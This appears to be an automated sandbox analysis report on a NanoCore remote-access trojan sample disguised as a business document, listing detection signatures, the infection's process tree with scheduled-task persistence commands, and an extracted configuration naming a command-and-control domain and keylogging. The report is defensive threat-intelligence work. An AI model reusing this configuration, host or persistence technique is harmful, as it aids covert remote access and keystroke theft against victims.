Play interactive tour

Edit tour

Analysis Report COMPANY PROFILE AND DOCUMENTED OFFER.scr

Overview

General Information

Sample Name:	COMPANY PROFILE AND DOCUMENTED OFFER.scr (renamed file extension from scr to exe)
Analysis ID:	356446
MD5:	589f3edcf4bccadde074acc68279cab1
SHA1:	c25f51fb32448d6323344cb2a07771a3908bf682
SHA256:	f22d8de0260841fba148d55ce317ac6a8c27ef46a6ccfb6ad7390eefe3d463bb
Tags:	NanoCoreRATscr
Most interesting Screenshot:

Detection

Nanocore

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Nanocore Rat

Found malware configuration

Malicious sample detected (through community Yara rule)

Sigma detected: NanoCore

Sigma detected: Scheduled temp file as task from temp location

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected AntiVM_3

Yara detected Nanocore RAT

.NET source code contains potential unpacker

.NET source code contains very large strings

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses schtasks.exe or at.exe to add and modify task schedules

Antivirus or Machine Learning detection for unpacked file

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains capabilities to detect virtual machines

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

COMPANY PROFILE AND DOCUMENTED OFFER.exe (PID: 7052 cmdline: 'C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe' MD5: 589F3EDCF4BCCADDE074ACC68279CAB1)

schtasks.exe (PID: 64 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\sjZXfoyePbSa' /XML 'C:\Users\user\AppData\Local\Temp\tmp66DE.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 6060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

COMPANY PROFILE AND DOCUMENTED OFFER.exe (PID: 5980 cmdline: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe MD5: 589F3EDCF4BCCADDE074ACC68279CAB1)

dhcpmon.exe (PID: 6848 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: 589F3EDCF4BCCADDE074ACC68279CAB1)

schtasks.exe (PID: 6056 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\sjZXfoyePbSa' /XML 'C:\Users\user\AppData\Local\Temp\tmpAD4D.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 4112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

dhcpmon.exe (PID: 6052 cmdline: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe MD5: 589F3EDCF4BCCADDE074ACC68279CAB1)

cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "6f656d69-7475-8807-1300-00", "Group": "worker", "Domain1": "", "Domain2": "hailongfvt.zapto.org", "Port": 3365, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000002.726986309.000000000410C000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x53b4d:$x1: NanoCore.ClientPluginHost 0x8636d:$x1: NanoCore.ClientPluginHost 0x53b8a:$x2: IClientNetworkHost 0x863aa:$x2: IClientNetworkHost 0x576bd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x89edd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000008.00000002.726986309.000000000410C000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000008.00000002.726986309.000000000410C000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x538b5:$a: NanoCore 0x538c5:$a: NanoCore 0x53af9:$a: NanoCore 0x53b0d:$a: NanoCore 0x53b4d:$a: NanoCore 0x860d5:$a: NanoCore 0x860e5:$a: NanoCore 0x86319:$a: NanoCore 0x8632d:$a: NanoCore 0x8636d:$a: NanoCore 0x53914:$b: ClientPlugin 0x53b16:$b: ClientPlugin 0x53b56:$b: ClientPlugin 0x86134:$b: ClientPlugin 0x86336:$b: ClientPlugin 0x86376:$b: ClientPlugin 0x53a3b:$c: ProjectData 0x8625b:$c: ProjectData 0x54442:$d: DESCrypto 0x86c62:$d: DESCrypto 0x5be0e:$e: KeepAlive
00000000.00000002.672841127.0000000002E21000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1fb2:$a: NanoCore 0x1fd7:$a: NanoCore 0x2030:$a: NanoCore 0x121cd:$a: NanoCore 0x121f3:$a: NanoCore 0x1224f:$a: NanoCore 0x1f0a4:$a: NanoCore 0x1f0fd:$a: NanoCore 0x1f130:$a: NanoCore 0x1f35c:$a: NanoCore 0x1f3d8:$a: NanoCore 0x1f9f1:$a: NanoCore 0x1fb3a:$a: NanoCore 0x2000e:$a: NanoCore 0x202f5:$a: NanoCore 0x2030c:$a: NanoCore 0x258aa:$a: NanoCore 0x25924:$a: NanoCore 0x2a4c1:$a: NanoCore 0x2b87b:$a: NanoCore 0x2b8c5:$a: NanoCore
00000008.00000002.724064551.0000000002F28000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000000.00000002.673686712.000000000408C000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x53b4d:$x1: NanoCore.ClientPluginHost 0x8636d:$x1: NanoCore.ClientPluginHost 0x53b8a:$x2: IClientNetworkHost 0x863aa:$x2: IClientNetworkHost 0x576bd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x89edd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000002.673686712.000000000408C000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000000.00000002.673686712.000000000408C000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x538b5:$a: NanoCore 0x538c5:$a: NanoCore 0x53af9:$a: NanoCore 0x53b0d:$a: NanoCore 0x53b4d:$a: NanoCore 0x860d5:$a: NanoCore 0x860e5:$a: NanoCore 0x86319:$a: NanoCore 0x8632d:$a: NanoCore 0x8636d:$a: NanoCore 0x53914:$b: ClientPlugin 0x53b16:$b: ClientPlugin 0x53b56:$b: ClientPlugin 0x86134:$b: ClientPlugin 0x86336:$b: ClientPlugin 0x86376:$b: ClientPlugin 0x53a3b:$c: ProjectData 0x8625b:$c: ProjectData 0x54442:$d: DESCrypto 0x86c62:$d: DESCrypto 0x5be0e:$e: KeepAlive
0000000E.00000002.739875552.0000000002D61000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000E.00000002.739875552.0000000002D61000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x69437:$a: NanoCore 0x69490:$a: NanoCore 0x694cd:$a: NanoCore 0x69546:$a: NanoCore 0x69499:$b: ClientPlugin 0x694d6:$b: ClientPlugin 0x69dd4:$b: ClientPlugin 0x69de1:$b: ClientPlugin 0x5f085:$e: KeepAlive 0x69921:$g: LogClientMessage 0x698a1:$i: get_Connected 0x5986d:$j: #=q 0x5989d:$j: #=q 0x598d9:$j: #=q 0x59901:$j: #=q 0x59931:$j: #=q 0x59961:$j: #=q 0x59991:$j: #=q 0x599c1:$j: #=q 0x599dd:$j: #=q 0x59a0d:$j: #=q
0000000E.00000002.737080835.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000E.00000002.737080835.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000E.00000002.737080835.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
0000000E.00000002.739970896.0000000003D69000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000E.00000002.739970896.0000000003D69000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x42ef5:$a: NanoCore 0x42f4e:$a: NanoCore 0x42f8b:$a: NanoCore 0x43004:$a: NanoCore 0x566af:$a: NanoCore 0x566c4:$a: NanoCore 0x566f9:$a: NanoCore 0x6f16b:$a: NanoCore 0x6f180:$a: NanoCore 0x6f1b5:$a: NanoCore 0x42f57:$b: ClientPlugin 0x42f94:$b: ClientPlugin 0x43892:$b: ClientPlugin 0x4389f:$b: ClientPlugin 0x5646b:$b: ClientPlugin 0x56486:$b: ClientPlugin 0x564b6:$b: ClientPlugin 0x566cd:$b: ClientPlugin 0x56702:$b: ClientPlugin 0x6ef27:$b: ClientPlugin 0x6ef42:$b: ClientPlugin
00000000.00000002.672967750.0000000002EA8000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000008.00000002.723420263.0000000002EA1000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: COMPANY PROFILE AND DOCUMENTED OFFER.exe PID: 5980	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x67ff4:$a: NanoCore 0x68031:$a: NanoCore 0x680ba:$a: NanoCore 0x6d452:$a: NanoCore 0x6d475:$a: NanoCore 0x6d4ca:$a: NanoCore 0x7290d:$a: NanoCore 0x7294b:$a: NanoCore 0x729d7:$a: NanoCore 0x7d374:$a: NanoCore 0x7d398:$a: NanoCore 0x7d3f0:$a: NanoCore 0x8500c:$a: NanoCore 0x850ad:$a: NanoCore 0x85110:$a: NanoCore 0x854c6:$a: NanoCore 0x855a2:$a: NanoCore 0x8600f:$a: NanoCore 0x861f4:$a: NanoCore 0x86243:$a: NanoCore 0x86296:$a: NanoCore
Process Memory Space: dhcpmon.exe PID: 6052	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x59bf9:$x1: NanoCore.ClientPluginHost 0x635bc:$x1: NanoCore.ClientPluginHost 0x6917b:$x1: NanoCore.ClientPluginHost 0x79fd5:$x1: NanoCore.ClientPluginHost 0x88da7:$x1: NanoCore.ClientPluginHost 0x59c1f:$x2: IClientNetworkHost 0x635e2:$x2: IClientNetworkHost 0x691c0:$x2: IClientNetworkHost 0x7a01a:$x2: IClientNetworkHost 0x88e08:$x2: IClientNetworkHost 0x8e20d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x9c17f:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: dhcpmon.exe PID: 6052	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: dhcpmon.exe PID: 6052	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x30169:$a: NanoCore 0x31fd4:$a: NanoCore 0x3203b:$a: NanoCore 0x320df:$a: NanoCore 0x59aeb:$a: NanoCore 0x59b8c:$a: NanoCore 0x59bf9:$a: NanoCore 0x59cba:$a: NanoCore 0x5ab8b:$a: NanoCore 0x5abde:$a: NanoCore 0x5ac17:$a: NanoCore 0x5ac8a:$a: NanoCore 0x5c040:$a: NanoCore 0x5c118:$a: NanoCore 0x5c134:$a: NanoCore 0x5c150:$a: NanoCore 0x5c16c:$a: NanoCore 0x634ae:$a: NanoCore 0x6354f:$a: NanoCore 0x635bc:$a: NanoCore 0x6367d:$a: NanoCore
Process Memory Space: COMPANY PROFILE AND DOCUMENTED OFFER.exe PID: 7052	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x72c8c:$x1: NanoCore.ClientPluginHost 0x91927:$x1: NanoCore.ClientPluginHost 0x72ced:$x2: IClientNetworkHost 0x91988:$x2: IClientNetworkHost 0x780f2:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x86064:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x96d8d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xa4cff:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: COMPANY PROFILE AND DOCUMENTED OFFER.exe PID: 7052	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: COMPANY PROFILE AND DOCUMENTED OFFER.exe PID: 7052	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: COMPANY PROFILE AND DOCUMENTED OFFER.exe PID: 7052	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x72791:$a: NanoCore 0x727ad:$a: NanoCore 0x72908:$a: NanoCore 0x72917:$a: NanoCore 0x72bf0:$a: NanoCore 0x72c1c:$a: NanoCore 0x72c8c:$a: NanoCore 0x826ce:$a: NanoCore 0x826e0:$a: NanoCore 0x8271c:$a: NanoCore 0x9142c:$a: NanoCore 0x91448:$a: NanoCore 0x915a3:$a: NanoCore 0x915b2:$a: NanoCore 0x9188b:$a: NanoCore 0x918b7:$a: NanoCore 0x91927:$a: NanoCore 0xa1369:$a: NanoCore 0xa137b:$a: NanoCore 0xa13b7:$a: NanoCore 0x72838:$b: ClientPlugin
Process Memory Space: dhcpmon.exe PID: 6848	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x60ed9:$x1: NanoCore.ClientPluginHost 0x7fb74:$x1: NanoCore.ClientPluginHost 0x60f3a:$x2: IClientNetworkHost 0x7fbd5:$x2: IClientNetworkHost 0x6633f:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x742b1:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x84fda:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x92f4c:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: dhcpmon.exe PID: 6848	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: dhcpmon.exe PID: 6848	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: dhcpmon.exe PID: 6848	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x609de:$a: NanoCore 0x609fa:$a: NanoCore 0x60b55:$a: NanoCore 0x60b64:$a: NanoCore 0x60e3d:$a: NanoCore 0x60e69:$a: NanoCore 0x60ed9:$a: NanoCore 0x7091b:$a: NanoCore 0x7092d:$a: NanoCore 0x70969:$a: NanoCore 0x7f679:$a: NanoCore 0x7f695:$a: NanoCore 0x7f7f0:$a: NanoCore 0x7f7ff:$a: NanoCore 0x7fad8:$a: NanoCore 0x7fb04:$a: NanoCore 0x7fb74:$a: NanoCore 0x8f5b6:$a: NanoCore 0x8f5c8:$a: NanoCore 0x8f604:$a: NanoCore 0x60a85:$b: ClientPlugin
Click to see the 25 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
7.3.COMPANY PROFILE AND DOCUMENTED OFFER.exe.4b0a6a5.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x605:$x1: NanoCore.ClientPluginHost 0x3bd6:$x1: NanoCore.ClientPluginHost 0x63e:$x2: IClientNetworkHost
7.3.COMPANY PROFILE AND DOCUMENTED OFFER.exe.4b0a6a5.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x605:$x2: NanoCore.ClientPluginHost 0x3bd6:$x2: NanoCore.ClientPluginHost 0x720:$s4: PipeCreated 0x3cb4:$s4: PipeCreated 0x61f:$s5: IClientLoggingHost 0x3bf0:$s5: IClientLoggingHost
0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.2e56bb8.1.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
14.2.dhcpmon.exe.3db4575.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0x23c40:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost 0x23c6d:$x2: IClientNetworkHost
14.2.dhcpmon.exe.3db4575.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0x23c40:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0x24d1b:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost 0x23c5a:$s5: IClientLoggingHost
14.2.dhcpmon.exe.3db4575.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.2.dhcpmon.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
14.2.dhcpmon.exe.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
14.2.dhcpmon.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.2.dhcpmon.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
7.3.COMPANY PROFILE AND DOCUMENTED OFFER.exe.4af064e.2.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x6da5:$x1: NanoCore.ClientPluginHost 0x6dd2:$x2: IClientNetworkHost
7.3.COMPANY PROFILE AND DOCUMENTED OFFER.exe.4af064e.2.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x6da5:$x2: NanoCore.ClientPluginHost 0x7d74:$s2: FileCommand 0xc776:$s4: PipeCreated 0x6dbf:$s5: IClientLoggingHost
8.2.dhcpmon.exe.2ed6b58.1.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
14.2.dhcpmon.exe.3daff4c.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
14.2.dhcpmon.exe.3daff4c.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
14.2.dhcpmon.exe.3daff4c.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
8.2.dhcpmon.exe.414f9c0.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x429ad:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x429ea:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x4651d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
8.2.dhcpmon.exe.414f9c0.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x42725:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x429ad:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x43fe6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x43fda:$s2: FileCommand 0x1266b:$s3: PipeExists 0x44e8b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x4ac42:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost 0x429d7:$s5: IClientLoggingHost
8.2.dhcpmon.exe.414f9c0.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
8.2.dhcpmon.exe.414f9c0.4.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0x42715:$a: NanoCore 0x42725:$a: NanoCore 0x42959:$a: NanoCore 0x4296d:$a: NanoCore 0x429ad:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x42774:$b: ClientPlugin 0x42976:$b: ClientPlugin 0x429b6:$b: ClientPlugin 0x1007b:$c: ProjectData 0x4289b:$c: ProjectData 0x10a82:$d: DESCrypto 0x432a2:$d: DESCrypto 0x1844e:$e: KeepAlive
0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.40cf9c0.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x429ad:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x429ea:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x4651d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.40cf9c0.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x42725:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x429ad:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x43fe6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x43fda:$s2: FileCommand 0x1266b:$s3: PipeExists 0x44e8b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x4ac42:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost 0x429d7:$s5: IClientLoggingHost
0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.40cf9c0.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.40cf9c0.4.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0x42715:$a: NanoCore 0x42725:$a: NanoCore 0x42959:$a: NanoCore 0x4296d:$a: NanoCore 0x429ad:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x42774:$b: ClientPlugin 0x42976:$b: ClientPlugin 0x429b6:$b: ClientPlugin 0x1007b:$c: ProjectData 0x4289b:$c: ProjectData 0x10a82:$d: DESCrypto 0x432a2:$d: DESCrypto 0x1844e:$e: KeepAlive
14.2.dhcpmon.exe.2dc9658.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
14.2.dhcpmon.exe.2dc9658.2.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
8.2.dhcpmon.exe.414f9c0.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
8.2.dhcpmon.exe.414f9c0.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
8.2.dhcpmon.exe.414f9c0.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
8.2.dhcpmon.exe.414f9c0.4.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
